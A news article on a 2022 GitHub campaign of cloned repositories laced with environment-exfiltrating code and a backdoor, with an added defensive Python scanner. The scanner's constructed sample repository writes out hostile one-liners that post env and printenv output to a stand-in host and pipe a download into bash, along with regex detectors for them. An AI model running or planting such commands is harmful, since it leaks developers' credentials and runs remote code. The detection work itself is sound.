Large Malware Campaign Hits Popular Developer Platform GitHub with 35,000 Code Hits

Developer James Tucker noted that the cloned repositories carrying the malicious URL not only exfiltrated a user’s environment variables but also contained a one-line backdoor.

Popular development platform GitHub was hit by a large, widespread malware campaign on Wednesday, August 3, 2022, with more than 35,000 “code hits” (matches for the malicious URL in GitHub code search) reported in a single day. Notably, it surfaced on the same day that more than 8,000 Solana wallets were drained.

Software engineer Stephen Lacy reported the campaign after noticing the malicious code while reviewing a project. Lacy wrote:

I’ve found evidence of what seems to be a big, widely disseminated malware assault against @github. Currently, github has over “code hits.” Currently discovered in the following projects: crypto, golang, python, js, bash, docker, and k8s. It is added to the install instructions, docker images, and npm scripts.

A wide range of projects, including crypto, Golang, Python, JavaScript, Bash, Docker, and Kubernetes, were targeted in this latest attack on GitHub. The malicious code was placed specifically in Docker images, npm scripts, and install documentation. Those are natural vectors: install instructions are where a project collects the shell commands a developer is expected to copy and run, usually without reading them closely.

The Malware Used in the GitHub Attack
The attacker did not break into existing projects. Instead, they cloned legitimate repositories, injected the malicious code into the copies, and pushed those copies back to GitHub, counting on developers to pick up a tampered clone instead of the original while the real maintainers noticed nothing. According to the investigation, the attacker also opened pull requests from a number of these clone repositories.

Developer James Tucker noted that the cloned repositories containing the malicious URL did two things: they exfiltrated the victim’s environment variables to a remote host, and they included a one-line backdoor. Environment variables are a rich target because developer shells and CI pipelines routinely hold API keys, tokens, cryptographic keys, and Amazon AWS credentials in them.

The one-line backdoor, in turn, lets a remote attacker run arbitrary code on the machine of anyone who runs the tampered script. According to BleepingComputer, the exact effect varied depending on when the code ran.
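The pattern described above, a shell one-liner hidden in install docs, npm scripts or a Dockerfile that dumps the environment to a remote host or pipes remote content into a shell, is something a practitioner can scan for before running anything from an unfamiliar clone. The following is an added example, not code from the article, from GitHub or from the campaign itself; the sample README, package.json and Dockerfile are constructed here, and the hostnames (example.invalid) are made up.

```python
"""Scan repository files for shell one-liners that exfiltrate the environment
or execute remote/decoded content. Added illustration; sample inputs below are
constructed and the hosts are invented."""
import json
import re
from typing import Dict, List, Optional, Tuple

# Reads the environment: env/printenv, or a reference to a secret-looking variable.
ENV_READ = re.compile(r"\b(env|printenv)\b|\$\{?[A-Z_]*(KEY|TOKEN|SECRET|AWS_)[A-Z_]*\}?")
# Uploads data with curl/wget (POST body or file upload flags on the same command).
UPLOAD = re.compile(r"\b(curl|wget)\b[^\n|;&]*(-d|--data|--data-binary|--post-data|--post-file|-T|-F)\b")
# Remote content piped straight into a shell, or base64 decoded into a shell.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^\n]*\|\s*(ba|z|da)?sh\b")
BASE64_EXEC = re.compile(r"base64\s+(-d|--decode)[^\n]*\|\s*(ba|z|da)?sh\b")


def classify(cmd: str) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for a single command, or None if it looks benign."""
    if ENV_READ.search(cmd) and UPLOAD.search(cmd):
        return "high", "environment read and uploaded to a remote host"
    if PIPE_TO_SHELL.search(cmd) or BASE64_EXEC.search(cmd):
        return "medium", "remote or decoded content executed by a shell"
    return None


def commands_from_markdown(text: str) -> List[Tuple[str, str]]:
    """Commands inside fenced code blocks (``` or ~~~), leading '$ ' prompt removed."""
    out, in_fence = [], False
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if s.startswith("```") or s.startswith("~~~"):
            in_fence = not in_fence
            continue
        if in_fence and s:
            out.append((f"line {n}", s.lstrip("$ ")))
    return out


def commands_from_package_json(text: str) -> List[Tuple[str, str]]:
    """Every npm lifecycle/script entry (postinstall is the classic hook)."""
    scripts = json.loads(text).get("scripts", {})
    return [(f"scripts.{name}", cmd) for name, cmd in scripts.items()]


def commands_from_dockerfile(text: str) -> List[Tuple[str, str]]:
    """RUN instructions, with backslash continuations joined into one command."""
    out, buf, start = [], [], 0
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if buf:
            buf.append(s.rstrip("\\").strip())
            if not s.endswith("\\"):
                out.append((f"line {start}", " ".join(buf)))
                buf = []
            continue
        if s.upper().startswith("RUN "):
            body, start = s[4:].strip(), n
            if body.endswith("\\"):
                buf = [body.rstrip("\\").strip()]
            else:
                out.append((f"line {n}", body))
    return out


def scan_file(name: str, text: str) -> List[Dict[str, str]]:
    """Dispatch on file type and classify each extracted command."""
    if name.endswith(".md"):
        cmds = commands_from_markdown(text)
    elif name.endswith("package.json"):
        cmds = commands_from_package_json(text)
    elif name.endswith("Dockerfile"):
        cmds = commands_from_dockerfile(text)
    else:
        return []
    findings = []
    for where, cmd in cmds:
        verdict = classify(cmd)
        if verdict:
            findings.append({"file": name, "where": where, "severity": verdict[0],
                             "reason": verdict[1], "command": cmd})
    return findings


def scan_repo(files: Dict[str, str]) -> List[Dict[str, str]]:
    return [f for name, text in files.items() for f in scan_file(name, text)]


# Constructed sample repository mimicking a tampered clone (hosts are invented).
SAMPLE_REPO = {
    "README.md": """# demo-tool

Install:

~~~sh
$ curl -fsSL https://example.invalid/demo/install.sh -o install.sh
$ sh install.sh
~~~

Extra step present only in the tampered clone:

~~~sh
$ curl -s -d "$(env)" https://example.invalid/collect >/dev/null 2>&1; pip install .
~~~
""",
    "package.json": json.dumps({"name": "demo-tool", "scripts": {
        "build": "tsc -p .",
        "postinstall": 'wget -q --post-data="$(printenv | base64 -w0)" '
                       "https://example.invalid/x -O /dev/null || true"}}),
    "Dockerfile": "\n".join([
        "FROM python:3.11-slim",
        "RUN pip install --no-cache-dir requests",
        "RUN curl -fsSL https://example.invalid/setup.sh \\",
        "    | bash",
        "COPY . /app"]),
}

if __name__ == "__main__":
    for f in scan_repo(SAMPLE_REPO):
        print(f"[{f['severity']}] {f['file']} ({f['where']}): {f['reason']}\n    {f['command']}")
```

Run against the constructed repository it reports two high-severity findings (the README step and the npm postinstall hook both read the environment and POST it) and one medium one (the Dockerfile pipes a download into bash). The heuristics are deliberately narrow: a plain download-then-run install is not flagged, and the point is to surface the exfiltration pattern for a human to review, not to replace reading the diff between a clone and its upstream.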

Most of the malicious commits were made within the last month. GitHub has since removed some of the malicious clones from the site. In a Wednesday update, GitHub said:

“GitHub is looking into the tweet from Wednesday, August 3, 2022, which said that:
* No repositories were hacked.
* Instead of the original repositories, malicious code was uploaded to cloned ones.
* There was no obvious breach of the GitHub or maintainer accounts, and the clones were quarantined.”
